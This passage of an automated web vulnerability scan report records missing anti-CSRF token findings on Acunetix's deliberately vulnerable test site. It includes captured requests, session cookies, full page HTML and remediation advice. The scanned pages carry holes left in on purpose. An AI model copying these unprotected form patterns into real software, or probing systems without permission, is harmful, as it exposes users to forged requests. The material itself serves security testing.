More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur, or that provides constructs that make it easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        14. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        15. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          No Anti-CSRF tokens were found in an HTML submission form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSignup" "tbPassword" "tbUsername" ].

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
